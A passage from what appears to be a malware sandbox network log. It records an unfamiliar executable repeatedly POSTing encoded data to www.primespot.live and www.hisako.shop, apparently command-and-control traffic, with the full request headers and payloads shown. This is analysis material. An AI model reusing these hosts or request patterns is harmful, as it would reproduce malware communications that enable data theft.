                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 32 34 65 77 61 43 32 49 32 50 31 7a 65 38 79 4f 52 63 6a 76 65 6e 52 52 58 68 59 6d 71 6c 63 75 7a 6b 39 73 54 51 6b 56 73 79 70 79 59 48 49 41 37 54 47 30 6e 78 6f 6f 6a 4d 72 30 44 64 75 79 36 64 32 67 71 54 79 67 43 49 2f 47 4d 58 7a 31 52 6a 36 53 42 7a 64 33 6c 33 63 36 38 34 62 4c 58 78 58 51 47 64 66 71 69 71 55 75 5a 30 61 44 34 4c 41 6f 56 69 34 53 33 73 62 45 6e 47 79 53 45 43 52 61 73 6b 6d 63 35 67 67 4b 6d 6f 35 66 68 4e 46 4e 42 4d 5a 66 4a 6a 77 67 49 4e 53 56 76 48 56 31 4c 48 6f 4a 73 71 47 32 6e 61 64 38 78 67 6f 68 46 6b 71 35 79 70 78 7a 76 43 4c 34 74 70 6e 34 79 61 48 6b 39 34 58 48 62 35 67 70 56 69 4f 48 41 73 79 70 53 47 4c 57
                                                                                  Data Ascii: LDVlCz=24ewaC2I2P1ze8yORcjvenRRXhYmqlcuzk9sTQkVsypyYHIA7TG0nxoojMr0Dduy6d2gqTygCI/GMXz1Rj6SBzd3l3c684bLXxXQGdfqiqUuZ0aD4LAoVi4S3sbEnGySECRaskmc5ggKmo5fhNFNBMZfJjwgINSVvHV1LHoJsqG2nad8xgohFkq5ypxzvCL4tpn4yaHk94XHb5gpViOHAsypSGLW
                                                                                  Dec 12, 2024 00:20:07.656577110 CET533INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 11 Dec 2024 23:20:07 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 389
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  23192.168.2.549980209.74.79.42805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:20:09.097485065 CET1795OUTPOST /icu6/ HTTP/1.1
                                                                                  Host: www.primespot.live
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.primespot.live
                                                                                  Referer: http://www.primespot.live/icu6/
                                                                                  Content-Length: 1243
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 32 34 65 77 61 43 32 49 32 50 31 7a 65 38 79 4f 52 63 6a 76 65 6e 52 52 58 68 59 6d 71 6c 63 75 7a 6b 39 73 54 51 6b 56 73 79 68 79 59 30 41 41 34 77 65 30 6d 78 6f 6f 71 73 72 35 44 64 75 7a 36 64 76 70 71 54 32 57 43 4f 37 47 4d 78 76 31 46 48 75 53 4b 7a 64 33 6e 33 63 33 69 49 61 44 58 78 48 63 47 63 76 71 69 71 55 75 5a 30 32 44 78 2b 73 6f 58 69 34 52 77 73 62 59 6a 47 79 71 45 43 70 67 73 6b 7a 72 34 51 41 4b 6d 4a 4a 66 67 34 70 4e 44 73 5a 64 41 7a 77 6f 49 4e 66 4c 76 48 4a 35 4c 47 63 7a 73 71 2b 32 6e 76 73 34 74 52 63 47 58 48 4f 76 37 62 70 4a 34 46 32 66 70 5a 2f 5a 77 64 2b 65 32 73 44 48 63 4a 55 6b 59 57 65 4c 53 62 37 39 57 79 7a 43 58 35 52 50 6c 41 52 37 53 51 52 57 6d 59 70 64 31 4e 4d 36 4f 2f 46 51 6a 34 37 46 34 41 66 4a 71 7a 78 37 2b 48 30 4f 75 53 62 71 42 6f 76 73 67 58 4d 76 48 71 4b 44 51 30 2b 79 49 6a 59 54 6f 4b 63 6f 63 66 44 62 4e 52 79 55 7a 75 4c 59 45 75 56 55 45 55 48 79 47 31 67 45 49 56 49 30 43 6d 32 76 78 6c 49 33 4f 6e 48 56 6b 4f 44 [TRUNCATED]
                                                                                  Data Ascii: LDVlCz=24ewaC2I2P1ze8yORcjvenRRXhYmqlcuzk9sTQkVsyhyY0AA4we0mxooqsr5Dduz6dvpqT2WCO7GMxv1FHuSKzd3n3c3iIaDXxHcGcvqiqUuZ02Dx+soXi4RwsbYjGyqECpgskzr4QAKmJJfg4pNDsZdAzwoINfLvHJ5LGczsq+2nvs4tRcGXHOv7bpJ4F2fpZ/Zwd+e2sDHcJUkYWeLSb79WyzCX5RPlAR7SQRWmYpd1NM6O/FQj47F4AfJqzx7+H0OuSbqBovsgXMvHqKDQ0+yIjYToKcocfDbNRyUzuLYEuVUEUHyG1gEIVI0Cm2vxlI3OnHVkODkJBYaJCh6SQ4aPI3ewOXH2QhgSoPGKw5dAmLJi9O2vitekNV2vO1wQ/kfobjqGGkzpYaXxAPgWPUoLHpu3i234K+oLu8S3nrsxOqLCfJEE/y148WsHhigRVPRSB5pCUaZrqe6BgWTI6ozV/2w/UpuHa91DFP1G0891BwT9V2sq6slKWaRrUMAoSSWi3Wugchsv5z4qD2pt2Hn0MiiijFk6IFlwGjKy4K7kgojtCuHIDIzhaUzQMiQ0HlUX8uoBJ4L4t+ybfTYMm98/Btuq0X4YaVR0Slz5845PloR8uiptiNSqAcAOmuGgNA04AiS1TtqfH7skFXqXMvKJ0nQiwcrIvrICPkPClHzNgEV1dYgbe0mjdx0G7vpaX71v2cJO/ujLVVbTymuJ1ROUTDW/Cp16y9OesXEgzrrxwNJvWaeSX8qnkSAw1XJGgkrDQTPSSFHwRUMmWpsTM9oLJalHB+b2OF6zc9DAFMUSdx+yRcoCAOo2swt5eY5k67C4CHlHMf6z0et4nsg8ADgj4WYfExDmfnTdEZ+lpi/b8YIUtljVLV8zpBHfoGukTZjqx928nv9ELK1iaD6cX4zLkxj/AUg7YBiMlwJn9oB21udqGCiQvTcLv+hEb89ciCg+WYoGb/N822HuDDeDUZng7cLDtEerc5J9ahJQBPbi [TRUNCATED]
                                                                                  Dec 12, 2024 00:20:10.574354887 CET533INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 11 Dec 2024 23:20:10 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 389
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  24192.168.2.549986209.74.79.42805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:20:11.766904116 CET505OUTGET /icu6/?NdLhG=cLCtFnqPUvutTbuP&LDVlCz=762QZ2SV6NpjcpWEPp/HDXxWZXZX1W4w6TtwEwMqgABTEXEh+wW122QWjov6SciVl+aW6WWJfJ+5Cw+tTwbMJ19RlEhii/WIAwuvAuC5wag6L1em5+IXdi875fnKjGjeWw== HTTP/1.1
                                                                                  Host: www.primespot.live
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Dec 12, 2024 00:20:12.984282017 CET548INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 11 Dec 2024 23:20:12 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 389
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  25192.168.2.55000118.139.62.226805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:20:19.499521017 CET749OUTPOST /o4tj/ HTTP/1.1
                                                                                  Host: www.hisako.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.hisako.shop
                                                                                  Referer: http://www.hisako.shop/o4tj/
                                                                                  Content-Length: 207
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 31 2f 75 2f 72 34 59 55 4d 69 33 36 52 39 30 41 46 55 30 45 4d 49 34 76 76 2b 6a 4e 76 41 79 78 73 71 56 37 58 6a 65 72 48 50 6f 69 59 35 76 66 31 52 63 36 4a 6c 44 75 46 56 67 41 5a 73 4a 65 2b 44 42 66 38 6f 71 55 2b 52 62 57 6a 49 42 37 4d 4b 55 6e 4e 6e 38 55 6e 2f 4e 50 2f 49 44 6c 75 71 48 4f 7a 70 53 66 74 52 58 44 4a 4a 59 78 69 52 37 38 32 72 6e 6d 64 4c 6c 46 59 31 67 70 42 51 30 69 46 34 75 47 2b 34 33 66 76 6f 79 35 38 31 42 45 4d 45 38 73 46 6f 50 37 56 72 44 58 68 4f 59 53 4c 51 56 2f 76 78 70 39 78 49 55 56 38 62 34 6c 47 4c 67 35 44 2f 50 63 5a 58 53 45 67 51 4c 67 6a 38 67 3d
                                                                                  Data Ascii: LDVlCz=1/u/r4YUMi36R90AFU0EMI4vv+jNvAyxsqV7XjerHPoiY5vf1Rc6JlDuFVgAZsJe+DBf8oqU+RbWjIB7MKUnNn8Un/NP/IDluqHOzpSftRXDJJYxiR782rnmdLlFY1gpBQ0iF4uG+43fvoy581BEME8sFoP7VrDXhOYSLQV/vxp9xIUV8b4lGLg5D/PcZXSEgQLgj8g=
                                                                                  Dec 12, 2024 00:20:21.104382992 CET362INHTTP/1.1 301 Moved Permanently
                                                                                  Server: openresty
                                                                                  Date: Wed, 11 Dec 2024 23:20:20 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 166
                                                                                  Connection: close
                                                                                  Location: https://www.hisako.shop/o4tj/
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  26192.168.2.55000218.139.62.226805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:20:22.157824993 CET769OUTPOST /o4tj/ HTTP/1.1
                                                                                  Host: www.hisako.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.hisako.shop
                                                                                  Referer: http://www.hisako.shop/o4tj/
                                                                                  Content-Length: 227
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 31 2f 75 2f 72 34 59 55 4d 69 33 36 51 64 45 41 48 7a 67 45 62 34 34 73 67 65 6a 4e 6d 67 7a 36 73 71 5a 37 58 6e 50 75 48 39 38 69 59 62 48 66 32 54 30 36 4b 6c 44 75 50 31 67 46 47 63 4a 41 2b 44 4d 31 38 6f 57 55 2b 52 66 57 6a 49 78 37 4e 35 73 34 4d 33 38 57 72 66 4e 4e 69 34 44 6c 75 71 48 4f 7a 6f 79 78 74 53 6e 44 4f 39 6b 78 6a 7a 44 39 70 62 6e 70 4b 37 6c 46 63 31 67 58 42 51 30 41 46 38 75 67 2b 2b 7a 66 76 6f 43 35 2f 6b 42 44 62 30 38 31 42 6f 4f 76 45 4f 79 61 34 39 45 70 48 78 6b 37 78 33 74 36 39 65 6c 2f 6d 35 77 4e 56 72 4d 42 54 73 48 72 49 6e 7a 74 36 7a 62 51 39 72 33 71 74 4b 58 67 6a 34 70 62 4f 4c 30 78 34 73 7a 36 63 36 58 42
                                                                                  Data Ascii: LDVlCz=1/u/r4YUMi36QdEAHzgEb44sgejNmgz6sqZ7XnPuH98iYbHf2T06KlDuP1gFGcJA+DM18oWU+RfWjIx7N5s4M38WrfNNi4DluqHOzoyxtSnDO9kxjzD9pbnpK7lFc1gXBQ0AF8ug++zfvoC5/kBDb081BoOvEOya49EpHxk7x3t69el/m5wNVrMBTsHrInzt6zbQ9r3qtKXgj4pbOL0x4sz6c6XB
                                                                                  Dec 12, 2024 00:20:23.732131958 CET362INHTTP/1.1 301 Moved Permanently
                                                                                  Server: openresty
                                                                                  Date: Wed, 11 Dec 2024 23:20:23 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 166
                                                                                  Connection: close
                                                                                  Location: https://www.hisako.shop/o4tj/
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  27192.168.2.55000318.139.62.226805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:20:24.813807011 CET1786OUTPOST /o4tj/ HTTP/1.1
                                                                                  Host: www.hisako.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.hisako.shop
                                                                                  Referer: http://www.hisako.shop/o4tj/
                                                                                  Content-Length: 1243
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 31 2f 75 2f 72 34 59 55 4d 69 33 36 51 64 45 41 48 7a 67 45 62 34 34 73 67 65 6a 4e 6d 67 7a 36 73 71 5a 37 58 6e 50 75 48 39 6b 69 62 71 6e 66 32 79 30 36 4c 6c 44 75 4a 46 67 45 47 63 49 63 2b 44 55 75 38 6f 62 6a 2b 54 58 57 68 72 35 37 45 6f 73 34 46 33 38 57 6a 2f 4e 4f 2f 49 43 74 75 70 2b 46 7a 6f 43 78 74 53 6e 44 4f 37 41 78 6e 68 37 39 72 62 6e 6d 64 4c 6c 5a 59 31 68 36 42 51 39 69 46 38 69 77 2b 50 50 66 75 4d 6d 35 35 53 74 44 5a 55 38 33 4d 49 4f 6e 45 4f 33 61 34 39 5a 48 48 78 67 42 78 77 5a 36 39 59 55 66 37 74 73 62 57 62 4d 6e 61 64 48 4b 64 6e 2f 37 33 51 50 4e 36 35 37 46 6c 65 54 35 73 63 52 73 44 59 56 36 72 61 4f 31 4d 75 6e 4c 6c 64 76 42 4d 52 65 4f 55 56 67 32 57 2f 38 75 66 59 7a 50 4f 71 52 53 50 68 51 59 4a 53 70 51 48 48 39 73 50 6b 69 49 54 44 62 2b 44 4d 49 76 62 69 4a 31 6e 61 4b 79 32 65 53 41 4e 6f 50 35 4b 35 41 6c 49 75 65 6b 4f 44 6c 43 76 4f 66 56 50 77 6b 6e 6e 52 4a 53 4e 34 78 4b 6b 6c 73 75 32 79 78 6f 33 45 6f 52 39 56 6a 66 52 68 33 [TRUNCATED]
                                                                                  Data Ascii: LDVlCz=1/u/r4YUMi36QdEAHzgEb44sgejNmgz6sqZ7XnPuH9kibqnf2y06LlDuJFgEGcIc+DUu8obj+TXWhr57Eos4F38Wj/NO/ICtup+FzoCxtSnDO7Axnh79rbnmdLlZY1h6BQ9iF8iw+PPfuMm55StDZU83MIOnEO3a49ZHHxgBxwZ69YUf7tsbWbMnadHKdn/73QPN657FleT5scRsDYV6raO1MunLldvBMReOUVg2W/8ufYzPOqRSPhQYJSpQHH9sPkiITDb+DMIvbiJ1naKy2eSANoP5K5AlIuekODlCvOfVPwknnRJSN4xKklsu2yxo3EoR9VjfRh3xMKqw8h4NqqSEwIBuoLwO1DxBwXH/xwroVfA1KI1qD/ibx4IhzybVzxEE5gEpZdbK/R0J8gDjkxcqVZ2O/GXMrIdS82/K02M/LqAX3EpkZ7/gm68JWLF3w9JlPGaBMbb8JpYzWrLFfQrYDaUXMFiyoQlObijZWng4wujmRlvB5ALNDFqlndblJuaP0jsXhJMxV92q4OxE4ClC3JbkUJjUC7ZVKKYfmJTk10Wt7i1Mt4pMfwMuejeM3upMOCTfWncyqroqyAon/9NRCR/o3LPc6VNyAE4S0Yqx4EJpOgnawHiIaNVI+QLnv+PkZ9bv0ME+4FdX3aMusmpOD/k0FCrxlXAzShwe+aeOpXZGg6htpWjIZ9USB0wLJoEsc5el2N/ouGHh65Qg80D99uNk0/coNZq2ITTMqGpJUKCoBSmvDP8c5R29JY9lr0hwHYHut5/SHxOY70hOLEGVfD325LPWXPLzqwCNom7RhmW10moLDuUVTwcIzX333Cfj9bAMaY26gOjYaF8tab8CJpHANEFPZznvbU8ySZs8wGN+DImsJ5x55O8DfSxQDmkEIbGxyIFLuGlUW/YlOkEtGxHFDB2t58J7G6zFdeTGHGG0Sv5FVXxRJFAjaePAjA/PxL+S6pUIGQ65k1X4sB2EznlZMhYDB5HG1TCy5FuM4 [TRUNCATED]
                                                                                  Dec 12, 2024 00:20:26.393815041 CET362INHTTP/1.1 301 Moved Permanently
                                                                                  Server: openresty
                                                                                  Date: Wed, 11 Dec 2024 23:20:26 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 166
                                                                                  Connection: close
                                                                                  Location: https://www.hisako.shop/o4tj/
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  28192.168.2.55000418.139.62.226805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:20:27.474821091 CET502OUTGET /o4tj/?LDVlCz=49GfoMoMEgfXZP1YCD85Y4F6kcmzgiifjOVZJgmdC9sULpLZnSwzXyHACQgjJ7sjiwZWkJjUpQH/sr9gZIVnDBJgsPBR+fKmpaKAjd6wyxi+eq8Hgh+Droj+Yb9QbnJwQg==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1
                                                                                  Host: www.hisako.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Dec 12, 2024 00:20:29.046928883 CET525INHTTP/1.1 301 Moved Permanently
                                                                                  Server: openresty
                                                                                  Date: Wed, 11 Dec 2024 23:20:28 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 166
                                                                                  Connection: close
                                                                                  Location: https://www.hisako.shop/o4tj/?LDVlCz=49GfoMoMEgfXZP1YCD85Y4F6kcmzgiifjOVZJgmdC9sULpLZnSwzXyHACQgjJ7sjiwZWkJjUpQH/sr9gZIVnDBJgsPBR+fKmpaKAjd6wyxi+eq8Hgh+Droj+Yb9QbnJwQg==&NdLhG=cLCtFnqPUvutTbuP
